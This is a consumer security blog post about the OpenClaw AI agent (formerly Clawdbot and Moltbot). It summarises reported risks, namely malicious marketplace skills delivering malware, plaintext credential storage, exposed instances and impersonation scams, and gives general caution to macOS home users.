The Clawdbot / Moltbot / OpenClaw Fiasco – Part 2
Update to: Current Status of OpenClaw – What Home Users Should Know
OpenClaw — the AI assistant formerly known as Clawdbot and briefly Moltbot — was one of the viral technology stories last month. It’s an open-source AI agent that runs locally on users’ machines, connects to messaging apps like WhatsApp or Telegram, and can automate tasks such as managing calendars, sending messages, or executing scripts on your system.
But what started as a fascinating experiment quickly turned into a widespread security cautionary tale, especially for macOS users and home consumers.
What OpenClaw Is
OpenClaw is an autonomous AI agent that can:
- Run on your local computer (Mac, Windows, Linux).
- Interact with apps and services (e.g., email, calendar, file system).
- Execute actions like running shell commands or managing files and messaging.
It’s not just a chatbot — it can actually perform actions on your computer, which is why it grabbed attention so quickly: it felt like AI with “hands” that do real, automated work.
Why It Blew Up — Rapid Adoption
After debuting in late-2025 as Clawdbot, the project quickly passed 100,000+ stars on GitHub and was rebranded twice (from Clawdbot to Moltbot to OpenClaw) in less than two weeks.
It became so popular that a related side project — Moltbook, a Reddit-style social network for AI agents — went viral.
Security Issues That Emerged
However, the excitement around OpenClaw quickly turned into warnings from researchers and security experts — and here’s why:
Malicious Skills and Supply-Chain Risks
OpenClaw uses an open skill marketplace called ClawHub, where users can download “skills” — plugins that extend the assistant’s functionality.
Researchers discovered that:
- Hundreds of skills were malicious, instructing users to run commands that delivered malware.
- These skills often masqueraded as crypto tools or utilities, tricking users into executing shell scripts that installed infostealers and backdoors.
This is fundamentally a supply-chain attack — malicious code delivered through third-party extensions users believe are legitimate.
Credential Storage Problems
Security analysts found that OpenClaw stored API keys, tokens, and login credentials in plain text in local directories like ~/.clawdbot — even after users deleted them.
This kind of insecure credential storage can expose sensitive accounts and data to anyone who gains access to your machine.
Configuration and Exposure Issues
Independent research revealed that thousands of instances of OpenClaw and its earlier names were internet-exposed and vulnerable, due to lack of proper access controls. These instances could leak API tokens and allow attackers to run commands remotely.
Social Engineering and Confusion
The frequent name changes (Clawdbot → Moltbot → OpenClaw) and rapid refactoring made it easy for scammers to:
- Clone repositories with fake code
- Set up malicious sites with confusing URLs
- Create fake extensions in marketplaces like Visual Studio Code.
This confusion amplified the security risk because users couldn’t easily know what code was authentic.
Expert Opinions & Cautionary Perspectives
Cybersecurity professionals have sounded strong warnings:
- Some experts — including AI safety advocate Gary Marcus — urged people not to use OpenClaw at all due to inherent security risks.
- Security advisories describe OpenClaw’s capability to deeply access or control systems as a potential entry point for malware if poorly vetted skills or configurations are used.
Meanwhile, academic research on agent ecosystems like Moltbook highlights that autonomous agents can share instructions that lead to risky actions, underscoring the unpredictable nature of these systems.
Where Things Stand Now
At the time of writing:
- OpenClaw remains popular and is actively developed.
- However, numerous security concerns have not been “solved” — they continue to be active issues for users and researchers.
- Many cybersecurity pros recommend avoiding OpenClaw unless you are highly experienced and understand the risks.
What This Means for macOS Users
For home macOS users, OpenClaw highlights broader lessons about AI-powered tools that can execute actions on your system:
- Just because software is open source doesn’t mean it’s safe out of the box.
- Tools that need deep system access (like executing shell commands) carry real risk.
- Third-party extensions/skills are a major attack surface.
- If you’re not sure what a skill does at a technical level, it’s safest not to install it.
These are the same principles we apply when talking about macOS security generally — only install software you trust, and understand the risks before giving deep permissions.
Resources Used — References & Further Reading
- Wikipedia
OpenClaw, Moltbook - Android Headlines
OpenClaw Explained - CyberInsider
341 OpenClaw skills distribute macOS malware via ClickFix instructions - Cyber Security News
OpenClaw AI Agent Skills Abused - XDA Developers
Please stop using OpenClaw - Igor’s Labs
How simple changes open the door to hackers and fraudsters - Hunt.io
Hunting OpenClaw Exposures - BitDefender
Technical Advisory: OpenClaw Exploitation in Enterprise Networks
SecureMac is dedicated to cutting through the noise and helping people stay safe, informed, and confident with their Macs. Lover of all things mac-security.
